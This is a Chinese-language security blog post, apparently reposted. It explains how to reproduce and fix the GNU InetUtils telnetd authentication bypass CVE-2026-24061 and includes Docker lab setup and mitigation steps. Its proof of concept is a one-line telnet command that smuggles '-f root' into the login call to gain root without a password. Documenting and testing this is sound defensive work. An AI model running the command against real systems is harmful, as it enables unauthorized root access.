2026-04-02 04:19:37 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： GNUInetUtilstelnetd存在远程认证绕过漏洞（CVE-2026-24061），攻击者可通过构造恶意环境变量USER的值（如-froot），绕过Telnet服务的身份验证流程，直接以root权限登录目标系统。该漏洞源于telnetd在调用/usr/bin/login时未对输入参数进行有效性校验，导致恶意参数被注入并执行。受影响版本为1.9.3至2.7。修复建议是立即停止并禁用telnetd/inetd服务，关闭23端口入站连接，或彻底卸载相关软件包，直到完成修复升级或迁移到SSH。 综合评分： 85 文章分类： 漏洞分析,渗透测试,红队,WEB安全,安全运营

cover_image

复现与修复指南：inetutils-telnetd远程认证绕过漏洞（CVE-2026-24061）

原创

秀逗猫秀逗猫

秀逗猫

2026年1月23日 00:14 北京

GNU InetUtils telnetd存在远程认证绕过漏洞（CVE-2026-24061），攻击者可通过构造恶意环境变量USER的值（如-f root），绕过Telnet服务的身份验证流程，直接以root权限登录目标系统。该漏洞源于telnetd在调用/usr/bin/login时未对输入参数进行有效性校验，导致恶意参数被注入并执行。

| 受影响组件 | 版本范围 | | — | — | | GNU InetUtils telnetd | >=1.9.3, <=2.7 |

复现指南

编写Dockerfile如下：

# 2.0版本
FROM&nbsp;debian:bullseye-slim
RUN&nbsp;sed -i&nbsp;'s|deb.debian.org|mirrors.aliyun.com|g; s|security.debian.org|mirrors.aliyun.com/debian-security|g'&nbsp;/etc/apt/sources.list && apt-get update
# 2.7版本
# FROM debian:forky-slim
# RUN sed -i 's|deb.debian.org|mirrors.aliyun.com|g; s|security.debian.org|mirrors.aliyun.com/debian-security|g' /etc/apt/sources.list.d/debian.sources && apt-get update
# 2.5版本
# FROM ubuntu:25.10
# RUN sed -i 's|archive.ubuntu.com|mirrors.aliyun.com|g; s|security.ubuntu.com|mirrors.aliyun.com|g' /etc/apt/sources.list && apt-get update

RUN&nbsp;apt-get install -y --no-install-recommends \
&nbsp; &nbsp; &nbsp; inetutils-telnetd inetutils-inetd \
&nbsp; &nbsp; && rm -rf /var/lib/apt/lists/*

# 修改root密码
RUN&nbsp;echo&nbsp;"root:xiudoumao"&nbsp;| chpasswd

COPY&nbsp;entrypoint.sh /entrypoint.sh
RUN&nbsp;chmod +x /entrypoint.sh

EXPOSE&nbsp;23
ENTRYPOINT&nbsp;["/entrypoint.sh"]

（上面注释的debian/ubuntu版本都可以使用）

entrypoint.sh如下：

#!/bin/sh
# 允许root用户通过伪终端(pts)直接登录系统
for&nbsp;i&nbsp;in&nbsp;$(seq 0 99);&nbsp;do
&nbsp;&nbsp;echo&nbsp;"pts/$i"&nbsp;>> /etc/securetty
done

# 向inetd.conf追加Telnet服务的标准配置，启用Telnet远程登录服务
printf&nbsp;"telnet\tstream\ttcp\tnowait\troot\t/usr/sbin/tcpd\t/usr/sbin/telnetd"&nbsp;>> /etc/inetd.conf

/usr/sbin/inetutils-inetd -d /etc/inetd.conf

build好容器再run

docker build -t&nbsp;"cve-2026-24061"&nbsp;.
docker run -itd -p 23:23 --name cve-2026-24061 cve-2026-24061

PoC如下：

USER='-f root'&nbsp;telnet -a vulnerable-ip
# 或
telnet -l&nbsp;"-f root"&nbsp;vulnerable-ip

运行后，就可以不输入密码直接登录系统。

这就是一个“复古级”严重漏洞——2026年还在开telnetd的系统，一条命令就能被root，赶紧关掉吧！

另外，如果是采用telnetd -E /bin/login方式则不受影响，因为-E参数会强制telnetd使用独立的环境变量空间，不继承父进程的环境变量。

修复指南

鉴于目前直接升级到2.8版本并不好弄，建议立即停止并禁用telnetd/inetd服务，关闭23端口的所有入站连接，或者彻底卸载相关软件包，直到完成修复升级或直接迁移到SSH。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：秀逗猫秀逗猫秀逗猫《复现与修复指南：inetutils-telnetd远程认证绕过漏洞（CVE-2026-24061）》